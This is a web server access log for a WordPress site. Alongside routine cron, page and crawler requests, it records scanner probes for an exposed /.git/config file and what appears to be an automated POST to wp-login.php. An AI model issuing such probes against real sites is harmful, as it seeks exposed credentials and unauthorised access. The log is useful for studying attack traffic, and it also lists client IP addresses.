36.133.115.36 - - [11/Sep/2025:05:27:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757539677.2673089504241943359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [11/Sep/2025:05:27:57 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Sep/2025:05:41:37 +0800] "POST /wp-cron.php?doing_wp_cron=1757540497.2821190357208251953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.176.172.43 - - [11/Sep/2025:05:41:37 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 7.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2754.88 Safari/537.36"
111.176.172.43 - - [11/Sep/2025:05:41:37 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 7.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2754.88 Safari/537.36"
111.176.172.43 - - [11/Sep/2025:05:41:37 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.1778.88 Safari/537.36"
17.241.219.221 - - [11/Sep/2025:05:43:45 +0800] "GET /2163/ HTTP/1.1" 200 23987 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
36.133.115.36 - - [11/Sep/2025:05:52:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757541173.1872160434722900390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
104.248.45.30 - - [11/Sep/2025:05:52:53 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
104.248.45.30 - - [11/Sep/2025:05:52:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [11/Sep/2025:06:09:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757542155.3464910984039306640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [11/Sep/2025:06:09:16 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [11/Sep/2025:06:13:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757542405.8592050075531005859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
40.192.65.175 - - [11/Sep/2025:06:13:25 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
40.192.65.175 - - [11/Sep/2025:06:13:27 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
36.133.115.36 - - [11/Sep/2025:06:19:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757542793.7660460472106933593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
16.112.19.99 - - [11/Sep/2025:06:19:53 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
16.112.19.99 - - [11/Sep/2025:06:19:54 +0800] "GET /.git/config HTTP/1.1" 404 8991 "-" "l9explore/1.2.2"
36.133.115.36 - - [11/Sep/2025:06:23:22 +0800] "POST /wp-cron.php?doing_wp_cron=1757543002.2644810676574707031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.14.210.15 - - [11/Sep/2025:06:23:22 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.14.210.15 - - [11/Sep/2025:06:23:27 +0800] "GET / HTTP/1.1" 200 33468 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
